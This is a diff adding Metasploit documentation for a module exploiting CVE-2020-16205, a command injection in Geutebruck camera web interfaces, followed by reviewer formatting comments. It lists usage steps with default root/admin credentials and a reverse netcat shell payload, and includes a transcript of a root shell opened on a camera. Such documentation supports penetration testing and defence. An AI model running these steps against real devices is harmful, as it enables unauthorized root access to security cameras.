diff --git a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md new file mode 100644 index 0000000000..242bbc9f79 --- /dev/null +++ b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md 
@@ -0,0 +1,68 @@ +## Vulnerable Application + +[Geutebruck](https://www.geutebrueck.com) Encoder and E2 Series Camera models: +G-Code: + EEC-2xxx +G-Cam: + EBC-21xx + EFD-22xx + ETHC-22xx + EWPC-22xx + +### Description + +This exploit a simple OS command injection (CVE-2020-16205) in the /uapi-cgi/admin/testaction.cgi page of the web interface of the Geutebruck G-Cam and G-Code products. +Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03 +Tested it with the 1.12.14.5 firmware only. + +## Verification Steps + +List the steps needed to make sure this thing works + + 1. Do: `use exploit/linux/http/geutebruck_testaction_exec` + 2. Do: `set httpusername root` + 3. Do: `set httppassword admin` + 4. Do: `set lhost 192.168.14.1` + 5. Do: `set rhosts 192.168.14.58` + 6. Do: `set payload cmd/unix/reverse_netcat_gaping` + 7. Do: `check` + 8. Do: `exploit` + +## Options + + ### HTTPUSERNAME + + A username used to authenticate on the admin page. **Default: root** + + ### HTTPPASSWORD + +The password of the username used to authenticate on the admin page. **Default: admin** + +## Scenarios + +``` +msf5 > use exploit/linux/http/geutebruck_testaction_exec +msf5 exploit(linux/http/geutebruck_testaction_exec) > +msf5 exploit(linux/http/geutebruck_testaction_exec) > set payload cmd/unix/reverse_netcat_gaping +payload => cmd/unix/reverse_netcat_gaping +msf5 exploit(linux/http/geutebruck_testaction_exec) > set httpusername root +httpusername => root +msf5 exploit(linux/http/geutebruck_testaction_exec) > set httppassword admin +httppassword => admin +msf5 exploit(linux/http/geutebruck_testaction_exec) > set lhost 192.168.14.1 +lhost => 192.168.14.1 +msf5 exploit(linux/http/geutebruck_testaction_exec) > set rhosts 192.168.14.58 +rhosts => 192.168.14.58 +msf5 exploit(linux/http/geutebruck_testaction_exec) > exploit + +[*] Started reverse TCP handler on 192.168.14.1:4444 +[*] 192.168.14.58:80 - Attempting to exploit... 
+[*] Command shell session 3 opened (192.168.14.1:4444 -> 192.168.14.58:43392) at 2020-04-02 18:26:28 +0200 +pwd + +/tmp/www_ramdisk/uapi-cgi/admin +id +uid=0(root) gid=0(root) +uname -a +Linux EFD-2250 2.6.18_IPNX_PRODUCT_1.1.2-ge52275bd #1 PREEMPT Thu Jul 25 20:25:39 KST 2019 armv5tejl GNU/Linux +```
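Review bot: The "Verification Steps" section still contains the module-documentation template placeholder "List the steps needed to make sure this thing works"; drop it or replace it with a sentence about the test setup (the 1.12.14.5 firmware noted under "Description"). Other points in the same hunk: "This exploit a simple OS command injection" should read "This module exploits a simple OS command injection"; the model list under "Vulnerable Application" has no list markers, so Markdown will collapse `G-Code:`, `EEC-2xxx`, `G-Cam:` and the following models into a single paragraph (use `* EEC-2xxx` style bullets, nested under the two families); the `### HTTPUSERNAME` and `### HTTPPASSWORD` headings and the first description are indented by a leading space, unlike the rest of the file, which is inconsistent and may not render as headings; and the "Scenarios" transcript never runs `check`, although verification step 7 lists it, so either show the `check` output in the transcript or remove step 7.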